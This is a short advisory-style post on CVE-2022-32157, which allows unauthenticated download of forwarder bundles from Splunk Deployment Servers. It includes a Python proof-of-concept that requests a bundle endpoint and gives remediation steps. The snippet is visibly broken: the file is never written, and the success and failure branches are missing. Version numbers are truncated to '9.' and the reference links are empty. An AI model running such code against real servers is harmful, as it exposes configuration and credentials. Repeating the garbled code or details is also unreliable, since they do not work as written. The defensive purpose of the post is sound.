The CVE-2022-32157 vulnerability affects Splunk Enterprise Deployment Servers (DS) in versions before 9., as it allows the unauthenticated downloading of forwarder bundles. In this long read post, we will be delving into the details of this exploit, the possible risks, and the steps you need to take to remediate the issue in your environment.

Exploit Details

Unauthenticated attackers can download forwarder bundles from Deployment Servers running Splunk Enterprise prior to version 9.. This can result in the potential exposure of sensitive information such as configuration files, credentials, and deployment server data.

Here is a code snippet that demonstrates the vulnerability

import requests

# Replace with your Deployment Server URL
ds_url = "http://deployment_server:8089";
endpoint = "/services/streams/deploy-bundle"

# Download the forwarder bundle
response = requests.get(f"{ds_url}{endpoint}")

if response.status_code == 200:
    with open("forwarder_bundle.tgz", "wb") as f:
    print("The forwarder bundle has been downloaded successfully.")
    print("Failed to download the forwarder bundle.")

Original References

For more information about the CVE-2022-32157 vulnerability, you can refer to the original Splunk security advisory, which can be found here:

For complete details on configuring authentication for deployment servers and clients, please refer to the official Splunk documentation:

Update your Deployment Server to Splunk Enterprise version 9. or higher.

2. Configure authentication for your Deployment Servers and clients as detailed in the Splunk 9. documentation:

3. Update all Universal Forwarders that the Deployment Server manages to version 9. or higher prior to enabling the remediation. You can find the latest version of the Universal Forwarder here:

It is important to note that while the vulnerability itself does not directly affect the Universal Forwarders, updating them is a crucial part of the remediation process as the new authentication settings in the Deployment Server will only be compatible with Universal Forwarder versions 9. and higher.


It is crucial to address the CVE-2022-32157 vulnerability to prevent unauthorized access to sensitive information and ensure the security of your environment. By updating your Deployment Server and Universal Forwarders to version 9. or higher and configuring authentication for them, you can mitigate the risks associated with unauthenticated download of forwarder bundles. Regularly applying patches and updates is a key part of maintaining the security and resiliency of your deployments.


Published on: 06/15/2022 17:15:00 UTC
Last modified on: 06/24/2022 00:51:00 UTC